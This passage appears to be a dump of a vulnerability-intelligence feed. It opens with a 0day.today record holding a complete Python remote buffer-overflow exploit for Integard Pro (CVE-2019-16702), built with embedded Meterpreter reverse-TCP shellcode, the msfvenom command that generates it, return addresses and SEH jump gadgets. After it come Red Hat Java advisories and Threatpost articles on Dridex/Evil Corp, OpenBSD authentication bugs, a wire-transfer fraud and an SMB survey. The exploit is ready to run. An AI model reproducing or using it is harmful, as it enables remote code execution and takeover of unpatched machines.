"2019-12-06T00:00:00", "id": "1337DAY-ID-33629", "href": "https://0day.today/exploit/description/33629", "title": "Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow Exploit", "type": "zdt", "sourceData": "Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow\r\nExploit Author: purpl3f0xsecur1ty\r\nVendor Homepage: https://www.tucows.com/\r\nSoftware Link: http://www.tucows.com/preview/519612/Integard-Home\r\nVersion: Pro 2.2.0.9026 / Home 2.0.0.9021\r\nTested on: Windows XP / Win7 / Win10\r\nCVE: CVE-2019-16702\r\n\r\n#!/usr/bin/python\r\n########################################################\r\n#~Integard Pro 2.2.0.9026 \"NoJs\" EIP overwrite exploit~#\r\n#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#\r\n# The vulnerability: Integard fails to sanitize input #\r\n# to the \"NoJs\" parameter in an HTTP POST request, #\r\n# resulting in a stack buffer overflow that overwrites #\r\n# the instruction pointer, leading to remote code #\r\n# execution. #\r\n########################################################\r\n\r\nimport socket\r\nimport os\r\nimport sys\r\nfrom struct import pack\r\n\r\ndef main():\r\n print \"~*Integard RCE Exploit for XP/7/10*~\"\r\n print \"Chose target: (Enter number only)\"\r\n print \"1) - Windows XP\"\r\n print \"2) - Windows 7/10\"\r\n target = str(input())\r\n host = \"10.0.0.130\"\r\n port = 18881\r\n\r\n ####################################################\r\n # Integard's functionality interferes with reverse #\r\n # and bind shells. Only Meterpreter seems to work. #\r\n ####################################################\r\n\r\n # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001\r\n # -b \"\\x00\\x26\\x2f\\x3d\\x3f\\x5c\" -f python -v meterpreter EXITFUNC=thread\r\n meterpreter = \"\\x90\" * 50\r\n meterpreter += \"\\xda\\xcd\\xbe\\xa2\\x51\\xce\\x97\\xd9\\x74\\x24\\xf4\"\r\n meterpreter += \"\\x5f\\x2b\\xc9\\xb1\\x5b\\x83\\xef\\xfc\\x31\\x77\\x15\"\r\n meterpreter += \"\\x03\\x77\\x15\\x40\\xa4\\x32\\x7f\\x06\\x47\\xcb\\x80\"\r\n meterpreter += \"\\x66\\xc1\\x2e\\xb1\\xa6\\xb5\\x3b\\xe2\\x16\\xbd\\x6e\"\r\n meterpreter += \"\\x0f\\xdd\\x93\\x9a\\x84\\x93\\x3b\\xac\\x2d\\x19\\x1a\"\r\n meterpreter += \"\\x83\\xae\\x31\\x5e\\x82\\x2c\\x4b\\xb3\\x64\\x0c\\x84\"\r\n meterpreter += \"\\xc6\\x65\\x49\\xf8\\x2b\\x37\\x02\\x77\\x99\\xa8\\x27\"\r\n meterpreter += \"\\xcd\\x22\\x42\\x7b\\xc0\\x22\\xb7\\xcc\\xe3\\x03\\x66\"\r\n meterpreter += \"\\x46\\xba\\x83\\x88\\x8b\\xb7\\x8d\\x92\\xc8\\xfd\\x44\"\r\n meterpreter += \"\\x28\\x3a\\x8a\\x56\\xf8\\x72\\x73\\xf4\\xc5\\xba\\x86\"\r\n meterpreter += \"\\x04\\x01\\x7c\\x78\\x73\\x7b\\x7e\\x05\\x84\\xb8\\xfc\"\r\n meterpreter += \"\\xd1\\x01\\x5b\\xa6\\x92\\xb2\\x87\\x56\\x77\\x24\\x43\"\r\n meterpreter += \"\\x54\\x3c\\x22\\x0b\\x79\\xc3\\xe7\\x27\\x85\\x48\\x06\"\r\n meterpreter += \"\\xe8\\x0f\\x0a\\x2d\\x2c\\x4b\\xc9\\x4c\\x75\\x31\\xbc\"\r\n meterpreter += \"\\x71\\x65\\x9a\\x61\\xd4\\xed\\x37\\x76\\x65\\xac\\x5f\"\r\n meterpreter += \"\\xbb\\x44\\x4f\\xa0\\xd3\\xdf\\x3c\\x92\\x7c\\x74\\xab\"\r\n meterpreter += \"\\x9e\\xf5\\x52\\x2c\\x96\\x11\\x65\\xe2\\x10\\x71\\x9b\"\r\n meterpreter += \"\\x03\\x61\\x58\\x58\\x57\\x31\\xf2\\x49\\xd8\\xda\\x02\"\r\n meterpreter += \"\\x75\\x0d\\x76\\x08\\xe1\\xa4\\x87\\x0c\\x71\\xd0\\x85\"\r\n meterpreter += \"\\x0c\\x52\\x08\\x03\\xea\\xc4\\x1a\\x43\\xa2\\xa4\\xca\"\r\n meterpreter += \"\\x23\\x12\\x4d\\x01\\xac\\x4d\\x6d\\x2a\\x66\\xe6\\x04\"\r\n meterpreter += \"\\xc5\\xdf\\x5f\\xb1\\x7c\\x7a\\x2b\\x20\\x80\\x50\\x56\"\r\n meterpreter += \"\\x62\\x0a\\x51\\xa7\\x2d\\xfb\\x10\\xbb\\x5a\\x9c\\xda\"\r\n meterpreter += \"\\x43\\x9b\\x09\\xdb\\x29\\x9f\\x9b\\x8c\\xc5\\x9d\\xfa\"\r\n meterpreter += \"\\xfb\\x4a\\x5d\\x29\\x78\\x8c\\xa1\\xac\\x49\\xe7\\x94\"\r\n meterpreter += \"\\x3a\\xf6\\x9f\\xd8\\xaa\\xf6\\x5f\\x8f\\xa0\\xf6\\x37\"\r\n meterpreter += \"\\x77\\x91\\xa4\\x22\\x78\\x0c\\xd9\\xff\\xed\\xaf\\x88\"\r\n meterpreter += \"\\xac\\xa6\\xc7\\x36\\x8b\\x81\\x47\\xc8\\xfe\\x91\\x80\"\r\n meterpreter += \"\\x36\\x7d\\xbe\\x28\\x5f\\x7d\\xfe\\xc8\\x9f\\x17\\xfe\"\r\n meterpreter += \"\\x98\\xf7\\xec\\xd1\\x17\\x38\\x0d\\xf8\\x7f\\x50\\x84\"\r\n meterpreter += \"\\x6d\\xcd\\xc1\\x99\\xa7\\x93\\x5f\\x9a\\x44\\x08\\x6f\"\r\n meterpreter += \"\\xe1\\x25\\xaf\\x90\\x16\\x2c\\xd4\\x90\\x17\\x50\\xea\"\r\n meterpreter += \"\\xad\\xce\\x69\\x98\\xf0\\xd3\\xcd\\x83\\xee\\xf9\\x3b\"\r\n meterpreter += \"\\x2c\\xb7\\x68\\x86\\x31\\x48\\x47\\xc5\\x4f\\xcb\\x6d\"\r\n meterpreter += \"\\xb6\\xab\\xd3\\x04\\xb3\\xf0\\x53\\xf5\\xc9\\x69\\x36\"\r\n meterpreter += \"\\xf9\\x7e\\x89\\x13\"\r\n\r\n if target == \"1\":\r\n print \"[*] Sending Windows XP payload using meterpreter/reverse_tcp\"\r\n # JMP ESP at 0x3E087557 in iertutil.dll\r\n crash = \"A\" * 512\r\n crash += pack(\"<L\",0x3E087557)\r\n crash += meterpreter\r\n crash += \"C\" * (1500 - len(crash))\r\n\r\n buffer = \"\"\r\n buffer += \"POST /LoginAdmin HTTP/1.1\\r\\n\"\r\n buffer += \"Host: 10.0.0.130:18881\\r\\n\"\r\n buffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\"\r\n buffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n buffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\"\r\n buffer += \"Accept-Encoding: gzip, deflate\\r\\n\"\r\n buffer += \"Referer: http://10.0.0.130:18881/\\r\\n\"\r\n buffer += \"Connection: close\\r\\n\"\r\n buffer += \"Upgrade-Insecure-Requests: 1\\r\\n\"\r\n buffer += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n buffer += \"Content-Length: 78\\r\\n\\r\\n\"\r\n buffer += \"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\"\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host,port))\r\n s.send(buffer)\r\n s.close()\r\n print \"[*] Done\"\r\n\r\n if target == \"2\":\r\n print \"[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp\"\r\n \r\n # ASLR IS ON!!! MUST USE NON-ASLR MODULE!\r\n # POP POP RET in integard.exe (ASLR disabled)\r\n nSEH = \"\\xEB\\xD0\\x90\\x90\" # Jump 48 bytes backwards\r\n SEH = pack(\"<L\",0x004042B0)\r\n\r\n jumpCall = \"\\xEB\\x09\" # Jump 11 bytes forward to hit the CALL in bigBackJump\r\n bigBackJump = \"\\x59\\xFE\\xCD\\xFE\\xCD\\xFE\\xCD\\xFF\\xE1\\xE8\\xF2\\xFF\\xFF\\xFF\"\r\n \r\n crash = \"\\x90\" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)\r\n crash += meterpreter\r\n crash += \"\\x90\" * 50\r\n crash += jumpCall\r\n crash += bigBackJump\r\n crash += nSEH\r\n crash += SEH\r\n\r\n\r\n buffer = \"\"\r\n buffer += \"POST /LoginAdmin HTTP/1.1\\r\\n\"\r\n buffer += \"Host: 10.0.0.130:18881\\r\\n\"\r\n buffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\"\r\n buffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n buffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\"\r\n buffer += \"Accept-Encoding: gzip, deflate\\r\\n\"\r\n buffer += \"Referer: http://10.0.0.130:18881/\\r\\n\"\r\n buffer += \"Connection: close\\r\\n\"\r\n buffer += \"Upgrade-Insecure-Requests: 1\\r\\n\"\r\n buffer += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n buffer += \"Content-Length: 78\\r\\n\\r\\n\"\r\n buffer += \"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\"\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host,port))\r\n s.send(buffer)\r\n s.close()\r\n print \"[*] Done\"\r\n\r\nmain()\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33629"}], "redhat": [{"lastseen": "2019-12-05T16:27:10", "bulletinFamily": "unix", "description": "IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.\n\nThis update upgrades IBM Java SE 7 to version 7R1 SR4-FP55.\n\nSecurity Fix(es):\n\n* OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892) (CVE-2019-2978)\n\n* OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298) (CVE-2019-2989)\n\n* OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573) (CVE-2019-2945)\n\n* OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690) (CVE-2019-2962)\n\n* OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684) (CVE-2019-2964)\n\n* OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505) (CVE-2019-2973)\n\n* OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532) (CVE-2019-2981)\n\n* OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915) (CVE-2019-2983)\n\n* OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292) (CVE-2019-2988)\n\n* OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597) (CVE-2019-2992)\n\n* OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765) (CVE-2019-2999)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:16:08", "published": "2019-12-05T20:03:45", "id": "RHSA-2019:4110", "href": "https://access.redhat.com/errata/RHSA-2019:4110", "type": "redhat", "title": "(RHSA-2019:4110) Moderate: java-1.7.1-ibm security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-05T16:26:31", "bulletinFamily": "unix", "description": "IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.\n\nThis update upgrades IBM Java SE 7 to version 7R1 SR4-FP55.\n\nSecurity Fix(es):\n\n* OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892) (CVE-2019-2978)\n\n* OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298) (CVE-2019-2989)\n\n* OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573) (CVE-2019-2945)\n\n* OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690) (CVE-2019-2962)\n\n* OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684) (CVE-2019-2964)\n\n* OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505) (CVE-2019-2973)\n\n* OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532) (CVE-2019-2981)\n\n* OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915) (CVE-2019-2983)\n\n* OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292) (CVE-2019-2988)\n\n* OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597) (CVE-2019-2992)\n\n* OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765) (CVE-2019-2999)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:15:12", "published": "2019-12-05T20:01:31", "id": "RHSA-2019:4109", "href": "https://access.redhat.com/errata/RHSA-2019:4109", "type": "redhat", "title": "(RHSA-2019:4109) Moderate: java-1.7.1-ibm security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "threatpost": [{"lastseen": "2019-12-06T13:46:13", "bulletinFamily": "info", "description": "U.S. authorities are offering up $5 million for information leading to the arrest of Evil Corp. leader Maksim V. Yakubets, 32, of Russia, who goes under the moniker \u201caqua.\u201d The U.S. alleges that Yakubets and his company have stolen millions of dollars from victims using the Dridex banking trojan and Zeus malware.\n\nSeparately, the U.S. Treasury Department [on Thursday](<https://home.treasury.gov/news/press-releases/sm845>) issued sanctions against Evil Corp, \u201cas part of a sweeping action against one of the world\u2019s most prolific cybercriminal organizations.\u201d\n\nThe $5 million is the largest such reward offer for a cybercriminal to date.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMaksim Yakubets allegedly has engaged in a decade-long cybercrime spree that deployed two of the most damaging pieces of financial malware ever used and resulted in tens of millions of dollars of losses to victims worldwide,\u201d said Assistant Attorney General Benczkowski [in a statement, Thursday](<https://www.justice.gov/opa/pr/russian-national-charged-decade-long-series-hacking-and-bank-fraud-offenses-resulting-tens?hootPostID=629d449ac4fd1b12d37f66d6551dbec1>). \u201cThese two cases demonstrate our commitment to unmasking the perpetrators behind the world\u2019s most egregious cyberattacks. The assistance of our international partners, in particular the National Crime Agency of the United Kingdom, was crucial to our efforts to identify Yakubets and his co-conspirators.\u201d\n\nThe indictment, which also charges a second Evil Corp. member, Igor Turashev, 38, alleges Yakubets was the leader the cybercrime gang and oversaw the development and distribution of the Dridex malware and botnet.\n\nSince its first appearance in 2012, [banking trojan Dridex](<https://threatpost.com/new-dridex-phishing-campaign-delivers-fake-accounting-invoices/127867/>) (also known as Bugat and Cridex) has been deployed via phishing emails and targets banking information. By 2015, the malware was one of the most [prevalent financial trojans](<https://threatpost.com/new-dridex-variant-slips-by-anti-virus-detection/146134/>) in the wild; while later versions of the malware were designed with the added function of assisting in the installation of ransomware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/12/05122000/photo12052019.jpg>)\n\nThe scheme involved capturing banking credentials, and causing banks to make unauthorized electronic funds transfers from unknowing victims\u2019 bank accounts. Money mules would then receive these stolen funds into their bank accounts, and transport the funds overseas. Multiple companies were targeted by Dridex, costing them millions of dollars; victims included two banks, a school district, a petroleum business, building materials supply company and others.\n\nThe indictment also alleges that Yakubets has also been involved with the [Zeus malware](<https://threatpost.com/zeus-banking-trojan-resurfaces-as-atmos-variant/117344/>) since 2009, which authorities claim he used to infect thousands of business computers with malicious software that captured passwords, account numbers and other information, before using that data to log into online banking accounts to steal money from victims.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/12/05121936/cybergroup.png>)\n\nPictures from the NCA showcase the lavish lifestyle of Evil Corp. leader Yakubets\n\nAt least 21 municipalities, banks, companies, and non-profit organizations were targeted by Zeus, with the overall attempted theft resulting in around $220 million in losses (actual losses before reimbursement from victim bank accounts totaled $70 million).\n\nThe National Crime Agency, which worked with U.S. authorities to identify the cybercrime ring, in a [separate report on Thursday](<https://www.nationalcrimeagency.gov.uk/news/international-law-enforcement-operation-exposes-the-world-s-most-harmful-cyber-crime-group>) shed some light on the members of Evil Corp. and the lavish lifestyle of Yakubets, who drives a customized Lamborghini \u201csupercar\u201d with a personalized number plate that translates to \u201cThief.\u201d He also spent more than a quarter of a million pounds ($330,000) on his wedding.\n\n\u201cWhile the harm caused by this group has targeted mainly financial institutions, there is no doubt that their activity has had real-world impacts, defrauding and stealing from victims in the U.K. and worldwide,\u201d Lynne Owens, director general of the NCA, said in a statement. \u201cThe Lamborghini Yakubets drives was someone\u2019s life savings, now emptied from their bank account.\u201d\n\nSeparately, the Department of Homeland Security (DHS) [on Thursday](<https://www.us-cert.gov/ncas/alerts/aa19-339a>) alerted companies about ongoing Dridex attacks targeting banking and financial companies via email spam messages. The alert warns companies to contact law enforcement immediately to report regarding any identified activity related to Dridex malware or its derivatives.\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n\nWrite a comment\n\n**Share this article:**\n\n * [Government](<https://threatpost.com/category/government/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Malware](<https://threatpost.com/category/malware-2/>)\n", "modified": "2019-12-05T17:55:43", "published": "2019-12-05T17:55:43", "id": "THREATPOST:082A6E9ABEDD3AF8D159ABE7C857B84A", "href": "https://threatpost.com/feds-5m-reward-evil-corp-dridex-hacker/150858/", "type": "threatpost", "title": "Feds Offer $5M Reward to Nab 'Evil Corp' Dridex Hacker", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T16:11:58", "bulletinFamily": "info", "description": "An authentication bypass and three local privilege-escalation (LPE) bugs have been uncovered in OpenBSD, the Unix-like open-source operating system known for its security protections.\n\nThe most severe of the vulnerabilities is the bypass (CVE-2019-19521), which is remotely exploitable.\n\nOpenBSD uses BSD authentication, which enables the use of passwords, S/Key challenge-and-response authentication and Yubico YubiKey tokens. In each of these cases, to perform the authentication, the string \u201c/usr/libexec/auth/login_style [-v name=value] [-s service] username class\u201d is used. If an attacker specifies the username \u201c-schallenge\u201d (or \u201c-schallenge:passwd,\u201d the authentication is automatically successful and therefore bypassed.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThat said, \u201cIts real-world impact should be studied on a case-by-case basis,\u201d said Qualys, the research firm that found the bugs, in [an advisory](<https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt?_ga=2.75852181.122675264.1575541632-949691503.1575541632>) issued this week. \u201cFor example, sshd is not exploitable thanks to its defense-in-depth mechanisms.\u201d\n\nThe other bugs include CVE-2019-19520, which allows LPE via xlock, which refuses all new server connections until a user enters a password at the keyboard; CVE-2019-19522, which allows LPE via the aforementioned authentication mechanisms S/Key and YubiKey; and CVE-2019-19519, which allows LPE via su.\n\nThe first bug exists because, \u201c/usr/X11R6/bin/xlock is installed by default and is set-group-ID \u2018auth,\u2019 not set-user-ID, which leaves an incomplete check,\u201d Qualys explained. \u201cA local attacker can exploit this vulnerability and dlopen() their own driver to obtain the privileges of the group \u2018auth.'\u201d\n\nArmed with the privileges of the group \u201cauth\u201d, a local attacker can then use the second LPE bug to obtain full root privileges, if the S/Key or YubiKey authentication type is enabled.\n\n\u201c[That\u2019s because login_skey and login_yubikey do not verify that the files in /etc/skey and /var/db/yubikey belong to the correct user, and these directories are both writable by the group \u2018auth,'\u201d Qualys said.\n\nTo exploit the issue, a local attacker with \u201cauth\u201d privileges can add an S/Key entry (a file in /etc/skey) or a YubiKey entry (two files in /var/db/yubikey) for the user \u201croot.\u201d\n\nThe last bug allows a local attacker to exploit a problem in su. \u201cSu\u201d stands for \u201csubstitute user,\u201d and is used by a computer user to execute commands with the privileges of another user account. When executed it invokes a shell without changing the current working directory or the user environment.\n\nIn this case, a flaw in su\u2019s -L option (\u201cLoop until a correct username and password combination is entered\u201d) allows an attacker to log in as themselves but with another user\u2019s login class.\n\n[OpenBSD](<https://threatpost.com/experts-openbsd-backdoor-allegations-almost-certainly-false-121510/74782/>) patches are available, and users should [apply them](<https://www.openbsd.org/faq/faq10.html>) to protect against attacks.\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-05T16:06:51", "published": "2019-12-05T16:06:51", "id": "THREATPOST:4524DC4DCBB97B9FDC5E13DA68B9DD1A", "href": "https://threatpost.com/openbsd-authentication-lpe-bugs/150849/", "type": "threatpost", "title": "OpenBSD Hit with Authentication, LPE Bugs", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T15:56:06", "bulletinFamily": "info", "description": "Hackers pulled off an elaborate man-in-the-middle campaign to rip off an Israeli startup by intercepting a wire transfer from a Chinese venture-capital firm intended for the new business.\n\nNew research by [Check Point Software](<https://www.checkpoint.com/>) details how the security vendor uncovered the wire-transfer heist, in which an attacker used unique tactics\u2014including communicating through email and even canceling a critical in-person meeting\u2013to fool both parties on either end of the transfer, researchers said.\n\nCheck Point became involved in the incident when a $1 million wire-transfer made between the two parties never reached the startup, researchers said [in a report posted online Thursday](<https://research.checkpoint.com/2019/incident-response-casefile-a-successful-bec-leveraging-lookalike-domains/>).\n\nTypically in this [type of cybercrime](<https://threatpost.com/bank-settles-customer-wire-transfer-theft-052510/74015/>), a criminal will keep track of emails between the two parties arranging a wire transfer by creating an auto-forwarding rule to intercept them. In this case, the attacker went a above and beyond this, registering two new lookalike domains to get more closely involved in the action, researchers said. \n[](<https://threatpost.com/newsletter-sign/>) \nCheck Point researchers collected and analyzed the available logs, e-mails and PCs involved in the transfer, they said. What they discovered was that it was obvious upon examining the emails involved in the transfer that something was amiss, observing the activity between the lookalike domains and the two companies.\n\n\u201cThe first domain was essentially the same as the Israeli startup domain, but with an additional \u2018s\u2019 added to the end of the domain name,\u201d researchers wrote. \u201cThe second domain closely resembled that of the Chinese VC company, but once again added an \u2018s\u2019 to the end of the domain name.\u201d\n\nTo appear as if communication with the companies was legitimate, the attacker then sent two emails with the same headline as the original thread. The first was to the VC from the Israeli lookalike domain spoofing the email address of the Israeli startup\u2019s CEO, and the second to the Israeli startup from the lookalike Chinese VC company domain spoofing the VC account manager that handled the investment, researchers said.\n\n\u201cThis infrastructure gave the attacker the ability to conduct the ultimate man-in-the-middle attack,\u201d researchers wrote. \u201cEvery email sent by each side was in reality sent to the attacker, who then reviewed the email, decided if any content needed to be edited, and then forwarded the email from the relevant lookalike domain to its original destination.\u201d\n\nIndeed, the attackers sent 18 emails to the VC firm and 14 to the startup in the course of the campaign to disrupt the transaction and modify bank details so the wire eventually was sent to an account that attackers could access. Check Point traced the stolen money to a bank account belonging a closed business in Hong Kong, researchers said.\n\nAttackers even managed to use this communication to cancel a meeting that was scheduled in Shanghai between the Chinese owner of the account where the transfer was headed and the CEO of the Israeli startup, researchers said. The hackers sent separate emails to each party that used different excuses for the cancellation, according to Check Point.\n\n\u201cWithout this crucial act from the attacker\u2019s side, the whole operation would probably have failed,\u201d researchers said. \u201cIt\u2019s reasonable to expect that during the meeting, the account owner would be asked to verify the bank account changes that were made.\u201d\n\nThis act in and of itself showed that the attackers had experience, but what they did after they successfully pulled off their heist showed another level of arrogance, researchers said.\n\n\u201cInstead of cutting all lines of communication after such a heist, the threat actor(s) did not cease their efforts but tried to go after another round of the VC investment,\u201d they wrote in their report.\n\nEven after the parties affected by the attack remediated it, the CFO of the Israeli startup continues to receive one email every month from the spoofed CEO account that asks him to perform a wire transaction, researchers added.\n\nThe attack is a cautionary tale to anyone using wire transfers to send significant sums of money to put safeguards in place before the transaction goes through to ensure it can\u2019t be intercepted by a third party, and then to have incident response in place after to handle any crisis scenario immediately, researchers said.\n\nCheck Point offered a number of recommendations to avoid scenarios like the one they uncovered, including: adding a second verification to ensure the transaction made it to the intended party directly after sending it; keeping audit and access logs; maintaining all evidence of the transaction in case an investigation is needed; and using tools to identify any look-alike domains that may have been registered and appear suspect.\n\n[**Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-05T11:44:03", "published": "2019-12-05T11:44:03", "id": "THREATPOST:21AE7D819949E3EC3B23792C6E699BED", "href": "https://threatpost.com/ultimate-mitm-attack-steals-1m-from-israeli-startup/150840/", "type": "threatpost", "title": "'Ultimate' MiTM Attack Steals $1M from Israeli Startup", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T21:13:06", "bulletinFamily": "info", "description": "While APT activity is generally considered to be aimed at large enterprises housing valuable intellectual property, military-industrial entities, dissidents and civil society, and organizations of strategic importance to governments, the vast majority of small- and medium-sized businesses (SMBs) are concerned that they may be on the target list.\n\nA full 93 percent of all SMB executives in a recent survey from AppRiver believe that nation-state-backed attackers are attempting to use businesses like theirs to breach the country\u2019s digital security. And, this already-high figure jumps to 97 percent among larger SMBs with 150\u2013250 employees. The reasoning goes that APTs see SMBs as entry points into a supply chain through which they can access larger game.\n\nOverall, two-thirds (66 percent) of SMB execs (and three quarters or 76 percent of execs at larger SMBs) also believe that foreign attempts to breach national security or wage cyberwar will be more severe next year in the run up to the presidential election.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSMBs operating in specific verticals \u2013 government, healthcare and pharmaceutical, technology and telecom, and transportation and logistics \u2013 are the most concerned about these kinds of attacks, the data shows.\n\n\u201cIt is possible that as a small business grows, it could become a more likely target for bad actors,\u201d according to the report. \u201cIt is also possible that small businesses with cloud-based services with built-in security and fewer employees have fewer vulnerable attack entry points. However, as this year\u2019s growing attacks on [local municipalities](<https://threatpost.com/the-texas-ransomware-attacks-a-gamechanger-for-cybercriminals/147597/>), schools and [small hospitals](<https://threatpost.com/ransomware-attacks-leave-u-s-hospitals-turning-away-patients/148823/>) have shown, smaller organizations can no longer count on flying below the radar and being ignored by cybercriminals.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/12/04162706/AppRiverSMBAPT.png>)\n\nThese fears go hand-in-hand with planned investment. [The survey](<https://www.appriver.com/files/documents/cyberthreatindex/appriverq4_2019_index_summary_final_11222019.pdf>), released on Tuesday, found that 62 percent plan to increase their cybersecurity budgets in 2020 to shore up their defenses against these types of attacks. Just a fraction (8 percent) plan to reduce investment, while around a third (30 percent) plan to maintain their budget at the 2019 level.\n\nOnce again, larger SMBs trend slightly differently from their compatriots. Three-quarters (75 percent) of those with between 49 and 149 employees said they plan to increase their budget in 2020 and 17 percent plan to maintain their 2019 budget. Among SMBs with 150-250 employees, 81 percent plan to increase their budget in 2020 and just 10 percent plan to maintain their 2019 levels.\n\nIn all data sets, just a fraction (8 to 9 percent) plan to reduce their spending; these companies largely fall into the nonprofit (48 percent) and hospitality (47 percent) sectors.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/12/04162718/AppRiverSMBBudget.png>)\n\nThe report found that verticals that are most likely to increase cybersecurity budget in 2020 include technology and telecom (77 percent), government (76 percent), manufacturing (73 percent) and financial services/insurance (71 percent).\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital 